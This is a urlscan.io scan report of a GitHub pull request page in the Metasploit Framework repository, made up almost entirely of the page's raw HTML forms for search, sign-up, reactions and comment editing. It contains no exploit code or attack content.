github.com Open in urlscan Pro
140.82.121.4  Public Scan

Submitted URL: https://info.rapid7.com/NDExLU5BSy05NzAAAAF_9OPz874rxeJcyeKcunNq0xiiKUUd0RTBFA_cjB3oJVDnCTf8nPGkMBKXSgv4J-W-tUL3ozifaXyr...
Effective URL: https://github.com/rapid7/metasploit-framework/pull/15670?mkt_tok=NDExLU5BSy05NzAAAAF_9OPz81QCqDdjEZWk8eUms2MQ5hiho...
Submission: On October 06 via api from US — Scanned from DE

Form analysis 27 forms found in the DOM

GET /rapid7/metasploit-framework/search

<form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="2293158" data-scoped-search-url="/rapid7/metasploit-framework/search" data-owner-scoped-search-url="/orgs/rapid7/search"
  data-unscoped-search-url="/search" action="/rapid7/metasploit-framework/search" accept-charset="UTF-8" method="get">
  <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center">
    <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey="s,/" name="q" data-test-selector="nav-search-input" placeholder="Search"
      data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search"
      data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off">
    <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="TwGunqGPAVznmn7NEgPpu55vC3/Mhj3qsvj/0qRwmN4BP03eq1lbFyTdaNLP24ZaZQhhpLUsSZkdyHHkT2uJpQ==">
    <input type="hidden" class="js-site-search-type-field" name="type">
    <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash">
      <path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path>
      <path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path>
    </svg>
    <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
      <ul class="d-none js-jump-to-suggestions-template-container">
        <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option">
          <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion">
    <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
      <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
      <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
      <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
    </div>

    <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

    <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
    </div>

    <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
      <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
        In this repository
      </span>
      <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
        All GitHub
      </span>
      <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>

    <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
      Jump to
      <span class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>
  </a>
        </li>
      </ul>
      <ul class="d-none js-jump-to-no-results-template-container">
        <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2">
          <span class="color-text-secondary">No suggested jump to results</span>
        </li>
      </ul>
      <ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container">
        <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option">
          <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search">
    <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
      <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
      <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
      <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
    </div>

    <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

    <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
    </div>

    <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
      <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
        In this repository
      </span>
      <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
        All GitHub
      </span>
      <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>

    <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
      Jump to
      <span class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>
  </a>
        </li>
        <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option">
          <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search">
    <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
      <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
      <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
      <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
    </div>

    <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

    <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
    </div>

    <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
      <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this organization">
        In this organization
      </span>
      <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
        All GitHub
      </span>
      <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>

    <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
      Jump to
      <span class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>
  </a>
        </li>
        <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option">
          <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search">
    <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none">
      <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path>
</svg>
      <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path>
</svg>
      <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0">
    <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path>
</svg>
    </div>

    <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28">

    <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target">
    </div>

    <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search">
      <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository">
        In this repository
      </span>
      <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub">
        All GitHub
      </span>
      <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>

    <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump">
      Jump to
      <span class="d-inline-block ml-1 v-align-middle">↵</span>
    </div>
  </a>
        </li>
      </ul>
    </div>
  </label>
</form>

POST /join?return_to=%2Frapid7%2Fmetasploit-framework%2Fissues%2Fnew

<form class="js-signup-form" autocomplete="off" action="/join?return_to=%2Frapid7%2Fmetasploit-framework%2Fissues%2Fnew" accept-charset="UTF-8" method="post"><input type="hidden" data-csrf="true" name="authenticity_token"
    value="bd291KBqV2GsCzFWo72mbh4ZX3Qtgv7FYs0z8BsPCSYMfzNwcJ1p3QYDIYhJDY5aWC/ULMG+FylyYEFx/UAwsw=="> <auto-check src="/signup_check/username">
    <dl class="form-group">
      <dt class="input-label"><label name="user[login]" autocapitalize="off" autofocus="autofocus" for="user_login_issues">Pick a username</label></dt>
      <dd><input name="user[login]" autocapitalize="off" autofocus="autofocus" class="form-control" type="text" id="user_login_issues" autocomplete="off" spellcheck="false"></dd>
    </dl>
    <input type="hidden" data-csrf="true" value="pBYf9210MO3L3XhbMf2RoQX6a+OWeZUrhvVkiST8xV1SxsPToBXNiM3Sr8lwFjgythH0qFasXTcG09YcP67RTQ==">
  </auto-check>
  <auto-check src="/signup_check/email">
    <dl class="form-group">
      <dt class="input-label"><label name="user[email]" autocapitalize="off" for="user_email_issues">Email Address</label></dt>
      <dd><input name="user[email]" autocapitalize="off" class="form-control" type="text" id="user_email_issues" autocomplete="off" spellcheck="false"></dd>
    </dl>
    <input type="hidden" data-csrf="true" value="QsyCN52OJbWluxDluo/4Mo+awiKFhusrmigEAoZnY/gIBZe2JjiwWcPclbIlQfBUa/LAevL1R1crx/5jqcKsfA==">
  </auto-check>
  <auto-check src="/users/password">
    <dl class="form-group">
      <dt class="input-label"><label name="user[password]" for="user_password_issues">Password</label></dt>
      <dd><input name="user[password]" class="form-control" type="password" id="user_password_issues" autocomplete="off" spellcheck="false"></dd>
    </dl><input type="hidden" data-csrf="true" value="5F6rLSAtvsMRGLTGXckt6woVzBWpumdgtziXsrmBi8tEJCYtDKMO3MfnbP4tufuL/wo5oweVnYXGhsUUsu9ohQ==">
  </auto-check>
  <input type="hidden" name="source" class="js-signup-source" value="modal-issues">
  <input class="form-control" type="text" name="required_field_8e36" hidden="hidden">
  <input class="form-control" type="hidden" name="timestamp" value="1633534311549">
  <input class="form-control" type="hidden" name="timestamp_secret" value="9847e8769236bfb6bcaf1227b0a08e842a0aec5fdef83e894506ac82ea8c8e8c">
  <button data-ga-click="(Logged out) New issue modal, clicked Sign up, text:sign-up" type="submit" data-view-component="true" class="btn-primary btn btn-block mt-2"> Sign up for GitHub </button>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
    value="28iNKMHtowX/Ah02lZBM36ASOdxqPZf4JUDU8ZJHAZ7E3VY9wnAq9RR4wGmqqgVaJDvcE1Y1hvgTZ8Hju8j45g==">
  <input type="hidden" name="input[subjectId]" value="MDExOlB1bGxSZXF1ZXN0NzMzMTUyNjA4">
  <div class="comment-reactions-options">
    <button disabled="" class="
    btn-link
    tooltipped
    tooltipped-multiline
    d-flex
    flex-items-baseline
    social-reaction-summary-item
      color-text-secondary
    reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="HOORAY react" aria-label="wvu-r7 and ccondon-r7 reacted with hooray emoji" data-button-index-position="0"
      data-reaction-content="tada">
      <g-emoji alias="hooray" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f389.png" class="social-button-emoji">🎉</g-emoji>
      <span>2</span>
    </button>
  </div>
</form>

POST /rapid7/metasploit-framework/issues/15670

<form class="js-comment-update" id="issue-995381069-edit-form" action="/rapid7/metasploit-framework/issues/15670" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    data-csrf="true" name="authenticity_token" value="lzF+ANalxQMqjJY0kTuyTzhWkW/yqDoHr2auZor67hOxkecKJE0P0/x7XN3oIzo4hdvBTlqPsJWBhN/CiWyBuA=="></form>

POST /rapid7/metasploit-framework/pull/15670/review_comment/707831312

<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/707831312" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    name="authenticity_token" value="+xm1TUPjEhi+/RAAxgfNFQJTX+JFG5/Qm1SmrvXcp7xh5vg2pUOCrBeJ1P99z5Qc+k9qxHjOjRhRyE1oh51unw==" autocomplete="off">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/707831312/edit_form?textarea_id=discussion_r707831312-body&amp;comment_context=discussion"
    class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
    value="UZQxl+ej/JOG+QCHw0r7Qdh3QkFVqRrwkSTbt/G/rJKEpA1lKxESNyaKtSAtf+HiPN0aYonEY/vHLxm4q3LZEw==" autocomplete="off">
  <input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qMKYQ">
  <div class="comment-reactions-options js-comment-reactions-options">
  </div>
</form>

POST /rapid7/metasploit-framework/pull/15670/review_comment/707846350

<form class="js-comment-update" data-type="json" action="/rapid7/metasploit-framework/pull/15670/review_comment/707846350" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden"
    name="authenticity_token" value="gCvtI0vk+gepBjndTfdjzXrqJrxt2igiso+5YifkA02+62x824SKFQ8udGCS8Q7uMuzix0wZCD0WVakwCUuJLw==" autocomplete="off">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/pull/15670/review_comment/707846350/edit_form?textarea_id=discussion_r707846350-body&amp;comment_context=discussion"
    class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" name="authenticity_token"
    value="acAUGXpE6Sodhw5UDeEKzp7f6eBqv0GM4dsWopN5qsm88CjrtvYHjr30u/Pj1BBtenWxw7bSOIe30NStybTfSA==" autocomplete="off">
  <input type="hidden" name="input[subjectId]" value="PRRC_kwDOACL9ps4qMODO">
  <div class="comment-reactions-options js-comment-reactions-options">
  </div>
</form>

POST /rapid7/metasploit-framework/reactions

<form class="js-pick-reaction" action="/rapid7/metasploit-framework/reactions" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input type="hidden" data-csrf="true" name="authenticity_token"
    value="pdpEJViTzGp7AUWngjVwDyCo4XIHoBP5PybMezumXiK6z58wWw5FmpB7mPi9DzmKpIEEvTuoAvkJAdlpEimnWg==">
  <input type="hidden" name="input[subjectId]" value="IC_kwDOACL9ps42xw1y">
  <div class="comment-reactions-options">
    <button disabled="" class="
    btn-link
    tooltipped
    tooltipped-multiline
    d-flex
    flex-items-baseline
    social-reaction-summary-item
      color-text-secondary
    reaction-summary-item tooltipped-se" style="border-radius:100px;font-size:12px;" name="input[content]" type="submit" value="THUMBS_UP react" aria-label="zeroSteiner reacted with thumbs up emoji" data-button-index-position="0"
      data-reaction-content="+1">
      <g-emoji alias="thumbs up" fallback-src="https://github.githubassets.com/images/icons/emoji/unicode/1f44d.png" class="social-button-emoji">👍</g-emoji>
      <span>1</span>
    </button>
  </div>
</form>

POST /rapid7/metasploit-framework/issue_comments/919014770

<form class="js-comment-update" id="issuecomment-919014770-edit-form" action="/rapid7/metasploit-framework/issue_comments/919014770" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="uNH977W3h2/PaFkf8WbF39619dy6hqq4XZRverr6D4ZyQxRpsyDZlZk6zfTcLQdJ0TF5m9Lh6Y9XcdMLMgEBIQ==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/919014770/edit_form?textarea_id=issuecomment-919014770-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
        <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke"></path>
      </svg>
    </p>
    <p class="ml-1 mb-2 mt-2" data-show-on-error="" hidden="">
      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert">
        <path fill-rule="evenodd"
          d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z">
        </path>
      </svg> Sorry, something went wrong.
    </p>
  </include-fragment>
</form>

POST /rapid7/metasploit-framework/issue_comments/920061296

<form class="js-comment-update" id="issuecomment-920061296-edit-form" action="/rapid7/metasploit-framework/issue_comments/920061296" accept-charset="UTF-8" method="post"><input type="hidden" name="_method" value="put" autocomplete="off"><input
    type="hidden" data-csrf="true" name="authenticity_token" value="q2Eiz6ugq7Lc2KXuXrmzU69Buo3zSoUXR7kZ6xjYsNiNfHW/ZK7v7oARdi7ZQ4208XeGJd6gumib2FtSyY8bvA==">
  <include-fragment loading="lazy" src="/rapid7/metasploit-framework/issue_comments/920061296/edit_form?textarea_id=issuecomment-920061296-body&amp;comment_context=" class="previewable-comment-form js-comment-edit-form-deferred-include-fragment">
    <p class="text-center mt-3" data-hide-on-error="">
      <svg aria-label="Loading..." style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate">
        <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke"></circle>
